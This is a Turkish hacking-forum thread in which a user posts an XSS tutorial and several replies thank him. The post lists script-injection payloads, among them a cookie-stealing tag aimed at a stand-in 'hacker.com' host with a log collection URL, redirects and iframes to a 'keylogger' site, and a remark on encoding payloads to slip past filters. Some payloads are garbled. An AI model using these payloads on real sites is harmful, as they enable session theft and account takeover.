THT DUYURU

Web & Server Güvenliği Doğru web ve veritabanı sunucusu güvenliği sağlanmadan, bilgisayar korsanları hassas verilerinize erişebilir. Web, Sunucu ve veritabanı güvenliğini nasıl sağlayacağınızı buradan öğrenebilirsiniz.

chat
Seçenekler

Xss açığı

MixPro - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
07/2017
Nereden:
T Ü R K
Mesajlar:
2.495
Konular:
289
Teşekkür (Etti):
1528
Teşekkür (Aldı):
695
Ticaret:
(0) %
06-10-2017 17:02
#1
Xss açığı
Kullanıcılarda Veri Beklenen Alanlara Aşağıda Belirtilen Kodların Gönderilmesi Xss Web Yazılımlarında Xss Açıklarının Tespit Edilmesini Sağlayacaktır

1.
Kod:
Kod:
<script>alert(’XSS’)</script>
Bir uyarı mesajı çıkartarak içinde XSS yazılmasını sağlayan Javascript kodudur.

Orjinal Boyutunda Açmak İçin ( 1061x317 ) Buraya Tıklayın

Saldırgan bu şekilde veri girişine izin verilen web yazılımlarına zararlı kod göndererek XSS açığını tespit edebilir.


2.
Kod:

Kod:
<script      src=http://www.site.com></script>
XSS açığından faydalanarak web yazılımı ziyaret eden kullanıcılara başka bir site üzerindeki zararlı kodu yükleyebilir.


3.
Kod:
Kod:
<script>alert (********.cookie);</script>
Web yazılımının çerez bilgisinin ekran uyarı kutusu içinde görüntülenmesini sağlar.

4. XSS Açığı ile Çerez Çalma: Çerezler (Cookie) zayıf http protokolünün oturum durumunun kontrolünü ve kimlik doğrulamayı sağlayan zayıf bileşenleridir.Saldırgan eğer sayfayı ziyaret eden kullanıcıların Çerez bilgisini okuyup kaydedebilirse kendi bilgileri ile yerlerini değiştirerek kurbanın yetkilerine ulaşabilir.Bu işlemi XSS açığı bulunan web yazılımını ziyaret eden herkesin Çerez bilgilerini başka bir web yazılımına kaydeden bir Javascript kodu göndererek gerçekleştirebilir.

Aşağıda belirtilen Javascript kodu sayfayı ziyaret eden kullanıcıların bilgilerini bir başka web yazılımına kaydedilmesini sağlamaktadır.

Kod:

Kod:
<img src= "http://hacker.com/cgi-bin/spycoders.jpg">
ve saldırgan daha sonra bu XSS açığını kullanarak aldığı Çerez bilgilerini aşağıda belirtilen adresten okuyabilir ve kendi Çerez bilgileri ile değiştirebilir.

http://hacker.com/sniff/log.php

Bazı Çerez bilgileri içinde Kullanıcı adı ve şifre gibi önemli bilgilerin tutulduğunu düşünürsek XSS açıklarının ne kadar zararlı olabileceğini algılamış oluruz.Saldırgan elde ettiği bu bilgiler ile internet üzerinden kolayca ücretsiz bulabileceği Cookie Editor yazılımları ile kendi Çerez bilgilerini de kolayca değiştirerek kurbanın yetkilerine ulaşabilir.

5. XSS aöıkları URL üzerinden de test edilebilir.
6.
Kod:

http://www.kurban.com/members.php?id=<script>alert(’XSS’)</script>

Genelde XSS kodları <script>, <applet>, <object> ve <embed> kodları içinde web yazılımına gönderilir.
7.
Kod:

Kod:
<script type="text/javascript">
Kod:
<!--
Kod:
windows.********="http://www.spycoders.com/"
Kod:
//-->
Kod:
</script>
Yukarıda belirtilen örnek Javascript kodu XSS açığı olan bu web sayfasına giren kullanıcıları Online Keylogger Service sitesine yönlendirmektir.

8.
Kod:

Kod:
<iframe src=http://www.spycoders.com <
Web sayfasının içinde başka bir çerçeve içinde Online Keylogger Service adresine yönlendirme yapar.Bu şekilde saldırgan istediği zararlı kodu ActiveX ve benzeri yöntemler ile sistemlere bulaştırabilir.

9. Saldırganlar web yazılımlarındaki XSS zayıflıklarını tespit etmeye çalışırken web yazılımcıların olsa script girişlerini engellemek için kullandıkları yöntemleri anlamaya ve aşmaya çalışırlar.XSS saldırısını Evrensel Kod’a dönüştürmek saldırının maskelenmesini sağlayabilir.

Örneğin aşağıda bir XSS saldırı yöntemi ve onun Evrensel Kod’a dönüştürülmüş hali görüntülenmektedir.

Kod:

Kod:
<script>alert(’XSS’)</script>
Saldırganlar bu şekilde web yazılımcıların filtreleme yapabileceklerini düşünerek XSS saldırılarını farklı şekillerde web yazılımına göndermeye çalışırlar.


Konu MixPro tarafından (06-10-2017 17:45 Saat 17:45 ) değiştirilmiştir.
Xxxyev - ait Kullanıcı Resmi (Avatar)
Forumdan Uzaklaştırıldı
Üyelik tarihi:
08/2017
Mesajlar:
34
Konular:
2
Teşekkür (Etti):
15
Teşekkür (Aldı):
1
Ticaret:
(0) %
07-10-2017 12:52
#2
Copy paste degil mi ?
porsukhak - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
08/2017
Nereden:
T.Ü.R.K
Mesajlar:
1.753
Konular:
56
Teşekkür (Etti):
241
Teşekkür (Aldı):
212
Ticaret:
(0) %
07-10-2017 12:53
#3
Gayet güzel keşke resimlerde oslaydı fakat eline sağlık


Başarıların Daim olsun .
mekTR - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
09/2017
Nereden:
Urumqi
Mesajlar:
622
Konular:
72
Teşekkür (Etti):
65
Teşekkür (Aldı):
107
Ticaret:
(0) %
07-10-2017 12:54
#4
Eline sağlık hocam
---------------------

█▀█ █▀▀█ ▄█░ ▄▀▀▄
░▄▀ █▄▀█ ░█░ ▄▀▀▄
█▄▄ █▄▄█ ▄█▄ ▀▄▄▀

Ne değişti söyleyim; Hiçbir şey 🌟
MixPro - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
07/2017
Nereden:
T Ü R K
Mesajlar:
2.495
Konular:
289
Teşekkür (Etti):
1528
Teşekkür (Aldı):
695
Ticaret:
(0) %
07-10-2017 12:58
#5
Sağolun

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler